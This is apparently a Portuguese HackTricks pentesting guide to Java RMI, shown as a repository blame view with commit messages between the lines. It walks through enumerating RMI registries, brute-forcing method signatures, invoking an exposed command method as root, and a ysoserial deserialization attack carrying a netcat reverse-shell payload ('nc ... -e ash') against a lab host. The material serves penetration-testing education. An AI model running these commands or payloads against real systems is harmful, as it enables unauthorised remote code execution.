Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-28 07:31:10 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/1099-pentesting-java-rmi.md

336 lines
19 KiB
Markdown
Raw Normal View History

Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
# 1098/1099/1050 - Teste de invasão Java RMI - RMI-IIOP
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Outras maneiras de apoiar o HackTricks:
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
update
2023-01-01 16:19:07 +00:00
\
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente com as ferramentas comunitárias mais avançadas do mundo.\
Acesse hoje:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
update
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Informações Básicas
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
_A Invocação de Método Remoto Java_, ou _Java RMI_, é um mecanismo de _RPC_ orientado a objetos que permite que um objeto localizado em uma _máquina virtual Java_ chame métodos em um objeto localizado em outra _máquina virtual Java_. Isso permite que os desenvolvedores escrevam aplicativos distribuídos usando um paradigma orientado a objetos. Uma breve introdução ao _Java RMI_ de uma perspectiva ofensiva pode ser encontrada nesta [palestra da blackhat](https://youtu.be/t\_aw1mDNhzI?t=202).
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
**Porta padrão:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Normalmente, apenas os componentes padrão do _Java RMI_ (o _RMI Registry_ e o _Activation System_) estão vinculados a portas comuns. Os _objetos remotos_ que implementam a aplicação _RMI_ real geralmente são vinculados a portas aleatórias, conforme mostrado na saída acima.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
O _nmap_ às vezes tem dificuldades para identificar serviços _RMI_ protegidos por _SSL_. Se você encontrar um serviço _SSL_ desconhecido em uma porta _RMI_ comum, você deve investigar mais a fundo.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
## Componentes RMI
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Em termos simples, o _Java RMI_ permite que um desenvolvedor torne um _objeto Java_ disponível na rede. Isso abre uma porta _TCP_ onde os clientes podem se conectar e chamar métodos no objeto correspondente. Apesar de parecer simples, existem vários desafios que o _Java RMI_ precisa resolver:
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
1. Para despachar uma chamada de método via _Java RMI_, os clientes precisam saber o endereço IP, a porta de escuta, a classe ou interface implementada e o `ObjID` do objeto alvo (o `ObjID` é um identificador único e aleatório que é criado quando o objeto é disponibilizado na rede. É necessário porque o _Java RMI_ permite que vários objetos escutem na mesma porta _TCP_).
2. Clientes remotos podem alocar recursos no servidor invocando métodos no objeto exposto. A _máquina virtual Java_ precisa rastrear quais desses recursos ainda estão em uso e quais deles podem ser coletados pelo coletor de lixo.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
O primeiro desafio é resolvido pelo _RMI registry_, que é basicamente um serviço de nomes para o _Java RMI_. O _RMI registry_ em si também é um serviço _RMI_, mas a interface implementada e o `ObjID` são fixos e conhecidos por todos os clientes _RMI_. Isso permite que os clientes _RMI_ consumam o _RMI registry_ apenas conhecendo a porta _TCP_ correspondente.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Quando os desenvolvedores desejam disponibilizar seus _objetos Java_ na rede, geralmente os vinculam a um _RMI registry_. O _registry_ armazena todas as informações necessárias para se conectar ao objeto (endereço IP, porta de escuta, classe ou interface implementada e o valor `ObjID`) e o disponibiliza sob um nome legível (o _nome vinculado_). Os clientes que desejam consumir o serviço _RMI_ solicitam ao _RMI registry_ o _nome vinculado_ correspondente e o registro retorna todas as informações necessárias para se conectar. Assim, a situação é basicamente a mesma que com um serviço _DNS_ comum. O exemplo a seguir mostra um pequeno exemplo:
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
```java
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
import java.rmi.registry.Registry;
Update RMI source code example
2021-12-30 08:57:22 +00:00
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
public class ExampleClient {
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi
2023-09-03 18:16:00 +00:00
private static final String remoteHost = "172.17.0.2";
private static final String boundName = "remote-service";
public static void main(String[] args)
{
try {
Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name
String response = ref.remoteMethod(); // Call a remote method
} catch( Exception e) {
e.printStackTrace();
}
}
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
}
```
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
O segundo dos desafios mencionados é resolvido pelo _Coletor de Lixo Distribuído_ (_DGC_). Este é outro serviço _RMI_ com um valor `ObjID` bem conhecido e está disponível em praticamente cada ponto final _RMI_. Quando um cliente _RMI_ começa a usar um serviço _RMI_, ele envia uma informação para o _DGC_ de que o objeto remoto correspondente está em uso. O _DGC_ pode então rastrear a contagem de referência e é capaz de limpar objetos não utilizados.
GitBook: [master] one page modified
2021-06-10 16:42:00 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Juntamente com o _Sistema de Ativação_ obsoleto, estes são os três componentes padrão do _Java RMI_:
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
1. O _Registro RMI_ (`ObjID = 0`)
2. O _Sistema de Ativação_ (`ObjID = 1`)
3. O _Coletor de Lixo Distribuído_ (`ObjID = 2`)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Os componentes padrão do _Java RMI_ são vetores de ataque conhecidos há bastante tempo e múltiplas vulnerabilidades existem em versões desatualizadas do _Java_. Do ponto de vista de um atacante, esses componentes padrão são interessantes, porque eles implementaram classes/interfaces conhecidas e é facilmente possível interagir com eles. Esta situação é diferente para serviços _RMI_ personalizados. Para chamar um método em um objeto remoto, é necessário conhecer a assinatura do método correspondente antecipadamente. Sem conhecer uma assinatura de método existente, não há como se comunicar com um serviço _RMI_.
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Enumeração RMI
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) é um scanner de vulnerabilidades _Java RMI_ capaz de identificar automaticamente vulnerabilidades _RMI_ comuns. Sempre que identificar um ponto final _RMI_, você deve tentar:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] - plain-server2
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] - legacy-service
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] - plain-server
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] RMI server codebase enumeration:
[+]
[+] - http://iinsecure.dev/well-hidden-development-folder/
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] --> de.qtc.rmg.server.interfaces.IPlainServer
[+]
[+] RMI server String unmarshalling enumeration:
[+]
[+] - Caught ClassNotFoundException during lookup call.
[+] --> The type java.lang.String is unmarshalled via readObject().
[+] Configuration Status: Outdated
[+]
[+] RMI server useCodebaseOnly enumeration:
[+]
[+] - Caught MalformedURLException during lookup call.
[+] --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] Configuration Status: Non Default
[+]
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+]
[+] - Caught NotBoundException during unbind call (unbind was accepeted).
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI Security Manager enumeration:
[+]
[+] - Security Manager rejected access to the class loader.
[+] --> The server does use a Security Manager.
[+] Configuration Status: Current Default
[+]
[+] RMI server JEP290 enumeration:
[+]
[+] - DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] Vulnerability Status: Non Vulnerable
[+]
[+] RMI registry JEP290 bypass enmeration:
[+]
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
[+]
[+] RMI ActivationSystem enumeration:
[+]
[+] - Caught IllegalArgumentException during activate call (activator is present).
[+] --> Deserialization allowed - Vulnerability Status: Vulnerable
[+] --> Client codebase enabled - Configuration Status: Non Default
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
A saída da ação de enumeração é explicada com mais detalhes nas [páginas de documentação](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) do projeto. Dependendo do resultado, você deve tentar verificar as vulnerabilidades identificadas.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
Os valores `ObjID` exibidos pelo _remote-method-guesser_ podem ser usados para determinar o tempo de atividade do serviço. Isso pode permitir identificar outras vulnerabilidades:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] ObjNum: -4004948013687638236
[+] UID:
[+] Unique: 1442798173
[+] Time: 1640761503828 (Dec 29,2021 08:05)
[+] Count: -32760
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
## Bruteforcing de Métodos Remotos
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Mesmo quando não foram identificadas vulnerabilidades durante a enumeração, os serviços _RMI_ disponíveis ainda podem expor funções perigosas. Além disso, apesar de a comunicação _RMI_ com componentes padrão _RMI_ ser protegida por filtros de desserialização, ao interagir com serviços _RMI_ personalizados, tais filtros geralmente não estão em vigor. Conhecer as assinaturas de métodos válidos em serviços _RMI_ é, portanto, valioso.
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Infelizmente, o _Java RMI_ não suporta a enumeração de métodos em _objetos remotos_. Dito isso, é possível fazer força bruta nas assinaturas de métodos com ferramentas como [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) ou [rmiscout](https://github.com/BishopFox/rmiscout):
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] MethodGuesser is running:
[+] --------------------------------
[+] [ plain-server2 ] HIT! Method with signature String execute(String dummy) exists!
[+] [ plain-server2 ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] [ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] [6562 / 6562] [#####################################] 100%
[+] done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] - plain-server2 == plain-server
[+] --> String execute(String dummy)
[+] --> String system(String dummy, String[] dummy2)
[+] - legacy-service
[+] --> void logMessage(int dummy1, String dummy2)
[+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] --> String login(java.util.HashMap dummy1)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Métodos identificados podem ser chamados assim:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi
2023-09-03 18:16:00 +00:00
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
[+] uid=0(root) gid=0(root) groups=0(root)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
Ou você pode realizar ataques de desserialização assim:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI endpoint...
[+]
[+] Using non primitive argument type java.lang.String on position 0
[+] Specified method signature is String execute(String dummy)
[+]
[+] Caught ClassNotFoundException during deserialization attack.
[+] Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] Deserialization attack probably worked :)
$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Mais informações podem ser encontradas nestes artigos:
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
* [Atacando serviços Java RMI após JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
Translated to Portuguese
2023-06-06 18:56:34 +00:00
* [Adivinhação de Método](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Além de adivinhar, você também deve procurar em mecanismos de busca ou no _GitHub_ pela interface ou até mesmo pela implementação de um serviço _RMI_ encontrado. O _nome vinculado_ e o nome da classe ou interface implementada podem ser úteis aqui.
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Interfaces Conhecidas
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marca classes ou interfaces como `conhecidas` se estiverem listadas no banco de dados interno de serviços _RMI_ conhecidos da ferramenta. Nestes casos, você pode usar a ação `conhecida` para obter mais informações sobre o serviço _RMI_ correspondente:
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
[+] - jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] Endpoint: localhost:41695 TLS: no ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]
$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] JMX Server
[+]
[+] Class Name:
[+] - javax.management.remote.rmi.RMIServerImpl_Stub
[+] - javax.management.remote.rmi.RMIServer
[+]
[+] Description:
[+] Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+]
[+] Remote Methods:
[+] - String getVersion()
[+] - javax.management.remote.rmi.RMIConnection newClient(Object params)
[+]
[+] References:
[+] - https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] - https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+]
[+] Vulnerabilities:
[+]
[+] -----------------------------------
[+] Name:
[+] MLet
[+]
[+] Description:
[+] MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] is therefore most of the time equivalent to remote code execution.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
[+]
[+] -----------------------------------
[+] Name:
[+] Deserialization
[+]
[+] Description:
[+] Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] establish a working JMX connection, you can also perform deserialization attacks.
[+]
[+] References:
[+] - https://github.com/qtc-de/beanshooter
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
```
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
## Shodan
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* `port:1099 java`
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Ferramentas
GitBook: [master] 2 pages modified
2021-06-18 17:11:21 +00:00
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
GitBook: [master] one page modified
2020-10-05 15:35:22 +00:00
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
## Referências
* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
## Comandos Automáticos do HackTricks
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
```
Update Java RMI The content on pentesting Java RMI was not pretty useful. It was basically a one to one copy of a blog post that discusses only one characteristic of Java RMI. It was replaced by an short overview on how to pentest Java RMI. This overview contains everything one needs to know to get started.
2021-12-29 08:29:43 +00:00
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
HAC 1099
2021-08-12 12:35:15 +00:00
1099 Yaml
2021-08-15 18:15:13 +00:00
Entry_1:
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi
2023-09-03 18:16:00 +00:00
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}
HAC 1099
2021-08-12 12:35:15 +00:00
```
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
GitBook: [#3240] No subject
2022-06-06 22:28:05 +00:00
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi
2023-09-03 18:16:00 +00:00
\
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) para construir facilmente e **automatizar fluxos de trabalho** com as ferramentas comunitárias mais avançadas do mundo.\
Acesse hoje mesmo:
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
update
2023-01-01 16:19:07 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
Outras formas de apoiar o HackTricks:
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
Translated ['README.md', 'cryptography/certificates.md', 'forensics/basi
2023-09-03 18:16:00 +00:00
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes
2024-02-09 12:48:36 +00:00
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink